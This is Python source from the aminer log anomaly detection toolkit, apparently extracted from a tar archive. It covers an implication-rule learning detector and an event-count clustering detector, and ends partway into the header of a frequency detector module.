self.forward_hypotheses_inv[log_event].remove(delete_hypothesis) # Clean up triggered/resolved implications. while len(self.forward_hypotheses_queue) > 0: implication = self.forward_hypotheses_queue[0] if len(implication.hypothesis_trigger_timestamps) == 0: # Triggered timestamp was already deleted somewhere else. self.forward_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] == "obs": # Remove triggered timestamp. implication.hypothesis_trigger_timestamps.popleft() self.forward_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: # Too much time has elapsed; append negative evaluation. implication.hypothesis_trigger_timestamps.popleft() implication.add_hypothesis_observation(0, log_atom.atom_time) if implication.compute_hypothesis_stability() == -1 and implication.trigger_event in self.forward_hypotheses and \ implication in self.forward_hypotheses[implication.trigger_event]: # This check is required if a hypothesis was already removed, but triggered hypotheses are still in the queue. self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 self.forward_hypotheses[implication.trigger_event].remove(implication) self.forward_hypotheses_inv[implication.implied_event].remove(implication) if len(self.forward_hypotheses[implication.trigger_event]) == 0: del self.forward_hypotheses[implication.trigger_event] if len(self.forward_hypotheses_inv[implication.implied_event]) == 0: del self.forward_hypotheses_inv[implication.implied_event] self.forward_hypotheses_queue.popleft() continue break # Trigger implication B <= A when B occurs. if log_event in self.back_hypotheses_inv: for implication in self.back_hypotheses_inv[log_event]: if implication.stable == 0: implication.hypothesis_trigger_timestamps.append(log_atom.atom_time) self.back_hypotheses_queue.append(implication) # Resolve triggered implication B <= A when A occurs. if log_event in self.back_hypotheses: delete_hypotheses = [] for implication in self.back_hypotheses[log_event]: if implication.stable == 0: # Find first non-observed trigger timestamp trigger_timestamp_index = -1 for trigger_timestamp in implication.hypothesis_trigger_timestamps: trigger_timestamp_index += 1 if trigger_timestamp != "obs": break if trigger_timestamp_index != -1 and \ str(implication.hypothesis_trigger_timestamps[trigger_timestamp_index]) != "obs" and \ implication.hypothesis_trigger_timestamps[trigger_timestamp_index] >= log_atom.atom_time - \ self.hypothesis_max_delta_time: implication.add_hypothesis_observation(1, log_atom.atom_time) implication.hypothesis_trigger_timestamps[trigger_timestamp_index] = "obs" # Since only true observations occur here, check for instability not necessary. if implication.compute_hypothesis_stability() == 1: # Update p and min_eval_true according to the results in the sample. p = implication.hypothesis_evaluated_true / implication.hypothesis_observations implication.min_eval_true = self.get_min_eval_true(self.max_observations, p, self.alpha) # Add hypothesis to rules. if implication.trigger_event in self.back_rules: self.back_rules[implication.trigger_event].append(implication) self.log_back_rules_learned += 1 self.log_new_back_rules.append(implication) else: self.back_rules[implication.trigger_event] = [implication] self.log_back_rules_learned += 1 self.log_new_back_rules.append(implication) if implication.implied_event in self.back_rules_inv: self.back_rules_inv[implication.implied_event].append(implication) else: self.back_rules_inv[implication.implied_event] = [implication] # Drop time stamps of previous observations, start new observations for rule. implication.hypothesis_trigger_timestamps.clear() self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 # Remove implication from list of hypotheses. delete_hypotheses.append(implication) self.back_hypotheses_inv[implication.implied_event].remove(implication) else: implication.add_hypothesis_observation(0, log_atom.atom_time) if implication.compute_hypothesis_stability() == -1: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 delete_hypotheses.append(implication) self.back_hypotheses_inv[implication.implied_event].remove(implication) if len(self.back_hypotheses_inv[implication.implied_event]) == 0: del self.back_hypotheses_inv[implication.implied_event] for delete_hypothesis in delete_hypotheses: self.back_hypotheses[log_event].remove(delete_hypothesis) if len(self.back_hypotheses[log_event]) == 0: del self.back_hypotheses[log_event] # Clean up triggered/resolved implications. while len(self.back_hypotheses_queue) > 0: implication = self.back_hypotheses_queue[0] if len(implication.hypothesis_trigger_timestamps) == 0: self.back_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] == "obs": implication.hypothesis_trigger_timestamps.popleft() self.back_hypotheses_queue.popleft() continue if implication.hypothesis_trigger_timestamps[0] < log_atom.atom_time - self.hypothesis_max_delta_time: implication.hypothesis_trigger_timestamps.popleft() self.back_hypotheses_queue.popleft() continue break # Generate new hypotheses if len(self.hypothesis_candidates) > 0 and random.uniform(0.0, 1.0) < self.generation_factor: # nosec B311 implication_direction = random.randint(0, 1) # nosec B311 if self.sum_unstable_unknown_hypotheses >= self.max_hypotheses: # If too many hypotheses exist, do nothing. implication_direction = -1 if implication_direction == 0: for candidate in self.hypothesis_candidates: candidate_event = candidate[0] # Chronological implication is: candidate_event <= log_event implication = Implication(log_event, candidate_event, log_atom.atom_time, self.max_observations, self.min_eval_true) if log_event in self.back_hypotheses: # Only add hypotheses that are not already present as hypotheses. continue_outer = False for imp in self.back_hypotheses[log_event]: if candidate_event == imp.implied_event: continue_outer = True break if continue_outer: continue if log_event in self.back_rules: # Only add hypotheses that are not already present as rules. continue_outer = False for imp in self.back_rules[log_event]: if candidate_event == imp.implied_event: continue_outer = True break if continue_outer: continue # At this point it is known that the implication is new, otherwise a continue statement would have been reached if log_event in self.back_hypotheses: self.back_hypotheses[log_event].append(implication) else: self.back_hypotheses[log_event] = [implication] if candidate_event in self.back_hypotheses_inv: self.back_hypotheses_inv[candidate_event].append(implication) else: self.back_hypotheses_inv[candidate_event] = [implication] self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1 elif implication_direction == 1: for candidate in self.hypothesis_candidates: candidate_event = candidate[0] # Chronological implication is: candidate_event => log_event # Skip event A => event A since already covered by back hypotheses if log_event != candidate_event: implication = Implication(candidate_event, log_event, log_atom.atom_time, self.max_observations, self.min_eval_true) if candidate_event in self.forward_hypotheses: # Only add hypotheses that are not already present as hypotheses. continue_outer = False for imp in self.forward_hypotheses[candidate_event]: if log_event == imp.implied_event: continue_outer = True break if continue_outer: continue if candidate_event in self.forward_rules: # Only add hypotheses that are not already present as rules. continue_outer = False for imp in self.forward_rules[candidate_event]: if log_event == imp.implied_event: continue_outer = True break if continue_outer: continue # At this point it is known that the implication is new, otherwise a continue statement would have been reached if candidate_event in self.forward_hypotheses: self.forward_hypotheses[candidate_event].append(implication) else: self.forward_hypotheses[candidate_event] = [implication] if log_event in self.forward_hypotheses_inv: self.forward_hypotheses_inv[log_event].append(implication) else: self.forward_hypotheses_inv[log_event] = [implication] self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses + 1 if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Periodically remove old or unstable hypotheses. if log_atom.atom_time >= self.last_hypotheses_eval_timestamp + self.hypotheses_eval_delta_time: self.last_hypotheses_eval_timestamp = log_atom.atom_time empty_back_events = [] for event in self.back_hypotheses: outdated_hypotheses_indexes = [] i = 0 for implication in self.back_hypotheses[event]: if implication.stable == 0 and self.last_event_occurrence[ event] < log_atom.atom_time - self.delta_time_to_discard_hypothesis: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 outdated_hypotheses_indexes.append(i) self.back_hypotheses_inv[implication.implied_event].remove(implication) if len(self.back_hypotheses_inv[implication.implied_event]) == 0: del self.back_hypotheses_inv[implication.implied_event] i = i + 1 # Reverse list to avoid index changes after deletions. for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes): del self.back_hypotheses[event][outdated_hypothesis_index] if len(self.back_hypotheses[event]) == 0: empty_back_events.append(event) for empty_back_event in empty_back_events: del self.back_hypotheses[empty_back_event] empty_forward_events = [] for event in self.forward_hypotheses: outdated_hypotheses_indexes = [] i = 0 for implication in self.forward_hypotheses[event]: if implication.stable == 0 and implication.most_recent_observation_timestamp < log_atom.atom_time -\ self.delta_time_to_discard_hypothesis: self.sum_unstable_unknown_hypotheses = self.sum_unstable_unknown_hypotheses - 1 outdated_hypotheses_indexes.append(i) self.forward_hypotheses_inv[implication.implied_event].remove(implication) if len(self.forward_hypotheses_inv[implication.implied_event]) == 0: del self.forward_hypotheses_inv[implication.implied_event] i = i + 1 # Reverse list to avoid index changes after deletions. for outdated_hypothesis_index in reversed(outdated_hypotheses_indexes): del self.forward_hypotheses[event][outdated_hypothesis_index] if len(self.forward_hypotheses[event]) == 0: empty_forward_events.append(event) for empty_forward_event in empty_forward_events: del self.forward_hypotheses[empty_forward_event] # Remove old hypothesis candidates while len(self.hypothesis_candidates) > 0: candidate = self.hypothesis_candidates[0] if candidate[1] < log_atom.atom_time - self.hypothesis_max_delta_time: self.hypothesis_candidates.popleft() continue break # Add new hypothesis candidates rand_prob = random.uniform(0.0, 1.0) # nosec B311 if len(self.hypothesis_candidates) < self.candidates_size and rand_prob < self.generation_probability: self.hypothesis_candidates.append((log_event, log_atom.atom_time)) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" known_path_set = set() for event_a in self.back_rules: for implication in self.back_rules[event_a]: known_path_set.add( ("back", tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true)) for event_a in self.forward_rules: for implication in self.forward_rules[event_a]: known_path_set.add( ("forward", tuple(event_a), tuple(implication.implied_event), implication.max_observations, implication.min_eval_true)) PersistenceUtil.store_json(self.persistence_file_name, sorted(list(known_path_set))) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for record in persistence_data: implication_direction = record[0] trigger_event = tuple(record[1]) implied_event = tuple(record[2]) max_obs = record[3] min_eval_t = record[4] rule = Implication(trigger_event, implied_event, None, max_obs, min_eval_t) rule.stable = 1 if implication_direction == "back": if trigger_event in self.back_rules: self.back_rules[trigger_event].append(rule) else: self.back_rules[trigger_event] = [rule] if implied_event in self.back_rules_inv: self.back_rules_inv[implied_event].append(rule) else: self.back_rules_inv[implied_event] = [rule] elif implication_direction == "forward": if trigger_event in self.forward_rules: self.forward_rules[trigger_event].append(rule) else: self.forward_rules[trigger_event] = [rule] if implied_event in self.forward_rules_inv: self.forward_rules_inv[implied_event].append(rule) else: self.forward_rules_inv[implied_event] = [rule] logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last 60 " "minutes.", component_name, self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new forward rules and %s new back rules in the last " "60 minutes. Following new forward rules were learned: %s. Following new back rules were learned: %s", component_name, self.log_success, self.log_total, self.log_forward_rules_learned, self.log_back_rules_learned, self.log_forward_rules_learned, self.log_back_rules_learned) self.log_success = 0 self.log_total = 0 self.log_forward_rules_learned = 0 self.log_back_rules_learned = 0 self.log_new_forward_rules = [] self.log_new_back_rules = [] def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." class Implication: """Define the shape of an implication rule.""" def __init__(self, trigger_event, implied_event, generation_time, max_observations, min_eval_true): self.trigger_event = trigger_event self.implied_event = implied_event self.stable = 0 # 0 .. unknown, 1 .. stable, -1 .. unstable self.max_observations = max_observations self.min_eval_true = min_eval_true self.most_recent_observation_timestamp = generation_time self.hypothesis_trigger_timestamps = deque([]) self.rule_trigger_timestamps = deque([]) self.rule_observations = deque([]) # Hypothesis is only generated for observed implication. Thus, initialized with 1. self.hypothesis_observations = 1 self.hypothesis_evaluated_true = 1 def add_hypothesis_observation(self, result, timestamp): """Update the observation counts for a hypothesis.""" # Reset counters when max_observations is reached. self.most_recent_observation_timestamp = timestamp if self.hypothesis_observations >= self.max_observations: pass else: self.hypothesis_observations = self.hypothesis_observations + 1 self.hypothesis_evaluated_true = self.hypothesis_evaluated_true + result def compute_hypothesis_stability(self): """Compute the stability of a hypothesis.""" if self.hypothesis_evaluated_true >= self.min_eval_true: # Known that hypothesis is stable. self.stable = 1 elif (self.hypothesis_observations - self.hypothesis_evaluated_true) > (self.max_observations - self.min_eval_true): # Known that hypothesis will never be stable. self.stable = -1 else: # Stability is still unknown, more observations required. self.stable = 0 return self.stable def add_rule_observation(self, result): """Add a new rule to the observations.""" if len(self.rule_observations) >= self.max_observations: self.rule_observations.popleft() self.rule_observations.append(result) def evaluate_rule(self): """Evaluate a rule.""" ones = 0 for obs in self.rule_observations: ones = ones + obs return (len(self.rule_observations) - ones) <= (self.max_observations - self.min_eval_true) def __repr__(self): return str(self.trigger_event[-1]).split("/")[-1] + "->" + str(self.implied_event[-1]).split("/")[-1] + ", eval=" + str( self.hypothesis_evaluated_true) + "/" + str(self.hypothesis_observations) + ", rule=" + str( self.rule_observations) + ", ruletriggerts=" + str(self.rule_trigger_timestamps) def get_dictionary_repr(self): """Return the dictionary representation of an Implication.""" return {"trigger_event": self.trigger_event, "implied_event": self.implied_event, "stable": self.stable, "max_observations": self.max_observations, "min_eval_true": self.min_eval_true, "most_recent_observation_timestamp": self.most_recent_observation_timestamp, "hypothesis_trigger_timestamps": list(self.hypothesis_trigger_timestamps), "rule_trigger_timestamps": list(self.rule_trigger_timestamps), "rule_observations": list(self.rule_observations), "hypothesis_observations": self.hypothesis_observations, "hypothesis_evaluated_true": self.hypothesis_evaluated_true} def set_random_seed(seed): """Set the random seed for testing purposes.""" random.seed(seed) EventCountClusterDetector.py000066400000000000000000000535571500476301700364660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for clustering event and value count vectors.. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import math from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EventCountClusterDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when dissimilar event or value count vectors occur.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list=None, window_size=600, id_path_list=None, num_windows=50, confidence_factor=0.33, idf=False, norm=False, add_normal=False, check_empty_windows=True, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param window_size the length of the time window for counting in seconds. @param id_path_list parser paths of values for which separate count vectors should be generated. @param num_windows the number of vectors stored in the models. @param confidence_factor minimum similarity threshold for detection @param idf when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set). @param norm when true, count vectors are normalized so that only relative occurrence frequencies matter for detection. @param add_normal when true, count vectors are also added to the model when they exceed the similarity threshold. @param check_empty_windows when true, empty count vectors generated for time windows without event occurrences. @param persistence_id name of persistence document. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__(mutable_default_args=[ "target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "id_path_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, window_size=window_size, id_path_list=id_path_list, num_windows=num_windows, confidence_factor=confidence_factor, idf=idf, norm=norm, add_normal=add_normal, check_empty_windows=check_empty_windows, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.next_check_time = {} self.counts = {} self.known_counts = {} self.idf_total = set() self.idf_counts = {} self.log_windows = 0 self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False parser_match = log_atom.parser_match self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False if self.target_path_list is None or len(self.target_path_list) == 0: # Event is defined by the full path of log atom. constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False log_event = tuple(parser_match.get_match_dictionary().keys()) else: # Event is defined by value combos in target_path_list values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False log_event = tuple(values) # In case that id_path_list is set, use it to differentiate sequences by their id. # Otherwise, the empty tuple () is used as the only key of the current_sequences dict. id_tuple = () for id_path in self.id_path_list: id_match = parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. return False else: matches = [] if isinstance(id_match, list): matches = id_match else: matches.append(id_match) for match in matches: if isinstance(match.match_object, bytes): id_tuple += (match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (match.match_object,) # Create entry for the id_tuple in the current_sequences dict if it did not occur before. if id_tuple not in self.known_counts: self.known_counts[id_tuple] = [] # Update statistics for idf computation if self.idf and self.id_path_list: self.idf_total.add(id_tuple) if log_event in self.idf_counts: self.idf_counts[log_event].add(id_tuple) else: self.idf_counts[log_event] = set([id_tuple]) if id_tuple not in self.next_check_time: # First processed log atom, initialize next check time. self.next_check_time[id_tuple] = log_atom.atom_time + self.window_size self.log_windows += 1 elif log_atom.atom_time >= self.next_check_time[id_tuple]: # Log atom exceeded next check time; time window is complete. self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + self.window_size self.log_windows += 1 # Update next_check_time if a time window was skipped skipped_windows = 0 if log_atom.atom_time >= self.next_check_time[id_tuple]: skipped_windows = 1 + int((log_atom.atom_time - self.next_check_time[id_tuple]) / self.window_size) self.next_check_time[id_tuple] = self.next_check_time[id_tuple] + skipped_windows * self.window_size if self.check_empty_windows: self.detect(log_atom, id_tuple, {}) # Empty count vector self.detect(log_atom, id_tuple, self.counts[id_tuple]) # Reset counts vector self.counts[id_tuple] = {} # Increase count for observed events if id_tuple in self.counts: if log_event in self.counts[id_tuple]: self.counts[id_tuple][log_event] += 1 else: self.counts[id_tuple][log_event] = 1 else: self.counts[id_tuple] = {log_event: 1} self.log_success += 1 return True def add_to_model(self, id_tuple, count_vector): """Adds a count vector to the model (a fifo list of count vectors)""" if count_vector in self.known_counts[id_tuple]: # Avoid that model has identical count vectors multiple times return if len(self.known_counts[id_tuple]) >= self.num_windows: # Drop first (= oldest) count vector self.known_counts[id_tuple] = self.known_counts[id_tuple][1:] self.known_counts[id_tuple].append(count_vector) def detect(self, log_atom, id_tuple, count_vector): """Create anomaly event when anomaly score is too high.""" score = self.check(id_tuple, count_vector) if score == -1: # Sample is normal, only add to known values when add_normal is set if self.learn_mode and self.add_normal: self.add_to_model(id_tuple, count_vector) else: # Sample is anomalous, add to model when training and create event if self.learn_mode: self.add_to_model(id_tuple, count_vector) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": list(count_vector.keys()), "AffectedLogAtomFrequencies": list(count_vector.values())} if self.id_path_list is not None: analysis_component["AffectedIdValues"] = list(id_tuple) count_info = {"ConfidenceFactor": self.confidence_factor, "Confidence": score} event_data = {"AnalysisComponent": analysis_component, "CountData": count_info} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Frequency anomaly detected", sorted_log_lines, event_data, log_atom, self) def check(self, id_tuple, count_vector): """Computes the manhattan metric for the count vector and each count vector present in the model.""" min_score = 1 for known_count in self.known_counts[id_tuple]: # Iterate over all count vectors in the model manh = 0 manh_max = 0 for element in set(list(known_count.keys()) + list(count_vector.keys())): # Iterate over each val that occurs in one of the vectors idf_fact = 1 if self.idf and self.id_path_list: # Compute idf (weight rare value higher than ones that occur with many id_values) idf_fact = math.log10((1 + len(self.idf_total)) / len(self.idf_counts[element])) norm_sum_known = 1 norm_sum_count = 1 if self.norm: # Normalize vectors by dividing through sum norm_sum_known = sum(known_count.values()) norm_sum_count = sum(count_vector.values()) if element not in known_count: manh += count_vector[element] * idf_fact / norm_sum_count manh_max += count_vector[element] * idf_fact / norm_sum_count elif element not in count_vector: manh += known_count[element] * idf_fact / norm_sum_known manh_max += known_count[element] * idf_fact / norm_sum_known else: manh += abs(count_vector[element] * idf_fact / norm_sum_count - known_count[element] * idf_fact / norm_sum_known) manh_max += max(count_vector[element] * idf_fact / norm_sum_count, known_count[element] * idf_fact / norm_sum_known) score = 0 if manh_max != 0: # manh_max is zero when both vectors are empty, in this case, score remains at default 0, and normalize in all other cases score = manh / manh_max if score <= self.confidence_factor: # Found similar vector; abort early to avoid spending time on more checks # Return -1 since "true" score is unknown as not all vectors in the model were checked return -1 if min_score is None: min_score = score else: min_score = min(min_score, score) return min_score def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" known_counts_data = [] for id_tuple, vec_list in self.known_counts.items(): id_tuple_data = [] for vec_elem in vec_list: window_data = [] for log_ev, freq in vec_elem.items(): window_data.append((log_ev, freq)) id_tuple_data.append(sorted(window_data)) known_counts_data.append((id_tuple, sorted(id_tuple_data))) idf_total_data = [] idf_counts_data = [] if self.idf and self.id_path_list: idf_total_data = list(self.idf_total) for log_ev, id_list in self.idf_counts.items(): idf_counts_data.append((log_ev, sorted(id_list))) persist_data = [sorted(known_counts_data), sorted(idf_total_data), sorted(idf_counts_data)] PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" # Persisted data contains known count vectors, i.e., [[[, [[[,1],[,1]], [[,2],[,1]], ...]], # [,[[[,1]]]]], # 2) list of known id used for idf computation, i.e., [,], # 3) list of id observed for each value, i.e., [[,[,]],[,[]]]] persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for elem in persistence_data[0]: window_list = [] for log_ev_elem_list in elem[1]: elem_dict = {} for log_ev_elem in log_ev_elem_list: elem_dict[tuple(log_ev_elem[0])] = int(log_ev_elem[1]) window_list.append(elem_dict) self.known_counts[tuple(elem[0])] = window_list for elem in persistence_data[1]: self.idf_total.add(tuple(elem)) for elem in persistence_data[2]: id_elem_set = set() for id_elem in elem[1]: id_elem_set.add(tuple(id_elem)) self.idf_counts[tuple(elem[0])] = id_elem_set logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d " "time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in %d " "time windows in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_windows) self.log_success = 0 self.log_total = 0 self.log_windows = 0 EventFrequencyDetector.py000066400000000000000000001025741500476301700357670ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for event and value frequency deviations. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import numpy as np import math from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, \ STAT_LOG_NAME, 